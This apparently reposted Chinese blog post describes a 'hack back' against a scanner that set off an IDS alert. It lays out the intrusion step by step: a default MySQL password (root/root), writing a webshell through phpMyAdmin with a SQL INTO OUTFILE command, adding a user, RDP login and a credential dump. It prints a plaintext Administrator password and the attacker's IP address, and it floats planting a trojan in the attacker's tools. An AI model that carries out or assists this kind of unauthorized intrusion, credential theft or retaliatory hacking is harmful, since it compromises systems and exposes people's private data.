记一次通过IDS告警日志反怼扫描小黑

清晨起来打开窗，心情美美哒~~

然后就看见IDS报警了。。。报文如下：

标准的DEDECMS SQL注入EXP。以前对这种扫描都是忽略不见（公司网站JAVA系列），今天心血来潮，反日一下，看看是谁在作妖。

一、nmap扫描IP，开了80，访问一下得到UPUPW的站点。

得到网站根目录:C:/Users/Administrator/Downloads/UPUPW_AP5.6-1510/UPUPW_AP5.6/htdocs。 顺手mysql密码试一下~ root root ~

二、UPUPW默认的phpmyadmin路径为pmd。root权限进入后，直接写入webshell。

select "" into outfile "C:/Users/Administrator/Downloads/UPUPW_AP5.6-1510/UPUPW_AP5.6/htdocs/main.php";

还好顺利执行，并没有逼得我用UDF 或者log文件来写出shell~

三、连上shell，执行添加用户命令。

小黑看来比较疏忽安全，一点点防备都没有~~~

四、3389登录进入，dump下密码扩大化点战果。

Authentication Id:0;823353088

Authentication Package:NTLM

Primary User:admin

Authentication Domain:SEO-DICK-1

* User: admin

* Domain: SEO-DICK-1

* Password: 强势打码

Authentication Id:0;405599992

Authentication Package:NTLM

Primary User:angge$

Authentication Domain:SEO-DICK-1

* User: angge$

* Domain: SEO-DICK-1

* Password: 强势打码

Authentication Id:0;714996

Authentication Package:NTLM

Primary User:Administrator

Authentication Domain:SEO-DICK-1

* User: Administrator

* Domain: SEO-DICK-1

* Password: SEOdick007!@#123

这里发现一个隐藏用户angge，貌似是前人已经日过~从Administrator密码来看，大黑阔应该是做黑帽SEO的。

五、看看黑阔在干嘛。

批量扫描脚本-.- 比较简陋。

顺手收割小黑的果实。

六、T掉Administrator用户，开启WIN安全登录事件，抓下黑阔登录IP。

180.232.122.202 菲律宾普通宽带用户，马尼拉 马卡蒂。看来大黑阔可能肉身已经翻墙了。

七、更多攻击畅想

替换Administrator用户扫描的程序，套个木马进去网站安全扫描，等待大黑阔本地执行。大黑阔也可能带着本地磁盘连接主机，这时候也可以访问他本地磁盘替换木马程序。

没再做更多测试，打完收工了。本人比较厌恶这些瞎JB一直扫的批量工具，搞的我IDS天天报警不断，主机上的工具就不发了。

（编辑：长春站长网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!